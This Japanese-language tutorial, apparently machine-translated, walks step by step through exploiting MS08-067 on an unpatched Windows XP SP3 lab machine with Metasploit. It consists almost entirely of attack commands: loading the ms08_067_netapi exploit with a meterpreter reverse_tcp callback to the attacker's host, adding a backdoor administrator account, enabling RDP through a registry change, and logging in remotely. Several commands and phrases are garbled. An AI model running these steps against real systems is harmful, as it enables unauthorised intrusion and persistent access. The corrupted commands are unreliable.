WIN xpsp3システムでのMs08_067_netapiの脆弱性の悪用



Exploitation Ms08_067_netapi Vulnerability Win Xp Sp3 System



Ms08_067_netapiはMetasploitのやや古いオーバーフロー攻撃ペイロードであり、攻撃は比較的高い権限を取得できます
1:準備:WINxp sp3システム(パッチなし) ダウンロードリンク: http://blog.csdn.net/sql_injection/article/details/47683419 kali ipを攻撃します:192.168.243.133 ターゲットマシンのIP:192.168.243.136 2:準備が完了したら、kaliを開き、ターミナルを開きますmetasploitのmsfconsoleフレームワーク コマンド: msfconsole metasploitを開く前に、postgresqlに接続する必要があります。 service postgresql statr 3:検索してロードするMs08_067モジュール (1):searchコマンドを使用して、このモジュールを検索します。search ms08_067_netapi(2):アプリケーションによって検索されたモジュールアドレス:use exploit/windows/smb/ms08_067_netapi 4:ペイロードをロードしましょう: set payload windows/meterpreter/reverse_tcp
ロード後、設定する必要のあるパラメータを表示できます。show options
次に、以下に示すように:
5:上の図に示すように、RHOSTはドローンのIPであり、LHOSTはkaliのIPです。set RHOST attacked ip set LHOST attacked ip次に攻撃します:exploit

6:meterpreterコマンドが表示された後、攻撃は成功します。このとき、シェルを入力してターゲットマシンのcmdインターフェイスに入り、新しいユーザーを作成し、権限を上げます。
(1):ユーザーの作成:user net username password /add
(2):右エスカレーション:net localgroup administrators wmc /add



7:特権が発生した後、リモートでログインできますが、このポートはリモート接続に使用されるため、この時点で、ターゲットマシンがポート3389を開いているかどうかを確認します。 (1):開くかどうかを確認します。netstat -na


(2):明らかにそうではないので、それを開きます: REG ADD HKLMSYSTEMCurrentControlSetControlTerminal' 'Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f ご覧のとおり、ポート3389が開かれています。
8:次に、独自のローカルシステムを使用して、リモートで接続し、次のことを実行します。 (1)cmdを開き、リモート接続コマンドを入力します。 (2)この時点で、コンピュータ名のターゲットマシンのIPアドレスを入力してから、自分で作成したユーザー名とパスワードを入力します。
(3):正常に入力されました:
これですべての操作が完了しました。総括する: このとき、作成した新しいユーザーもターゲットで利用できます。パッチなしでドローンを使用してください。そうしないと、攻撃は失敗します。